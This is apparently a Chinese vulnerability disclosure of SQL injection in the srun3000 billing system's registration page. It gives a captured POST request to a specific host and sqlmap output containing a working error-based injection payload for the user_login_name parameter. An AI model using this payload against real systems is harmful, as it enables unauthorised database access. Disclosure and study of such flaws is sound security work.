srun3000计费系统 注入漏洞

### 简要描述： RT ### 详细说明： 挖得人还是挺多的啊。 ``` SQL：SELECT count(*) FROM `user` WHERE user_login_name='1'' AND user_real_name='Smith' error：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Smith'' at line 1 ``` 从报错语句中可以看到，user_login_name、user_real_name俩个参数过滤不严导致直接导入查询语句。 [<img src="https://images.seebug.org/upload/201407/05192518238a42c42410c2e475cbcece3f2fb3c8.jpg" alt="QQ图片20140705192647.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/05192518238a42c42410c2e475cbcece3f2fb3c8.jpg) ### 漏洞证明： 注册页面： [<img src="https://images.seebug.org/upload/201407/05192720974ed9e74105613adf47e6e065eee56a.jpg" alt="QQ图片20140705192845.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/05192720974ed9e74105613adf47e6e065eee56a.jpg) POST抓包： ``` POST /index.php?action=userregister&ts=do_check HTTP/1.1 Host: 202.207.48.61:8800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://202.207.48.61:8800/index.php?action=userregister&ts=do_check Cookie: PHPSESSID=ksgess1mromfe2h33j1ba4hlp7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 76 user_login_name=111111&user_real_name=111111111111&submit=%CF%C2%D2%BB%B2%BD ``` SQLMAP注入： ``` ests: --- Place: POST Parameter: user_login_name Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: user_login_name=111' AND (SELECT 1743 FROM(SELECT COUNT(*),CONCAT(C HAR(58,114,99,117,58),(SELECT (CASE WHEN (1743=1743) THEN 1 ELSE 0 END)),CHAR(58 ,101,99,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'dYkK'='dYkK&user_real_name=111&submit=锟斤拷一锟斤拷 --- [19:20:55] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.22, PHP 5.5.3 back-end DBMS: MySQL 5.0 ``` [<img src="https://images.seebug.org/upload/201407/051928186d7f8f1ba4f92c501e3fb68f90a6e33b.jpg" alt="QQ图片20140705192956.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/051928186d7f8f1ba4f92c501e3fb68f90a6e33b.jpg)